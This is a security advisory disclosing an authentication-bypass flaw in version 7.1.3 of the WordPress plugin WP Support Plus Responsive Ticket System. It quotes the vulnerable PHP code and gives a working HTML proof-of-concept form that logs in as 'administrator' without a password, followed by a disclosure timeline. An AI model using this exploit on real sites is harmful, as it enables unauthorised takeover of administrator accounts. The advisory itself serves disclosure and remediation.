10-01-2017 / Vulnerabilities

WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php

<?php 
if($_POST['email']=='') die();
$user_id = username_exists( $_POST['username'] );
if(!$user_id){
	$user_id=email_exists($_POST['email']);
	if(!$user_id){
		$random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
		$user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
		$full_name=explode(' ', $_POST['name']);
		$firstName=(isset($full_name[0]))?$full_name[0]:'';
		$lastName=(isset($full_name[1]))?$full_name[1]:'';
		wp_update_user(
			array(
			'ID' => $user_id,
			'first_name'=>$firstName,
			'last_name'=>$lastName,
			'display_name' => $_POST['name'],
			'role' => 'subscriber'
			)
		);
	}
}
$user_info = get_userdata($user_id);
if ( !is_user_logged_in() ) {
	wp_set_current_user( $user_id, $user_info->user_login );
	wp_set_auth_cookie( $user_id );
	do_action( 'wp_login', $user_info->user_login );
}
?>

Proof of Concept

Use form below:

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to admin panel.

Timeline

  • 06-12-2016: Discovered
  • 06-12-2016: Cannot contact with vendor
  • 08-01-2017: Version 8.0.0 released, issue resolved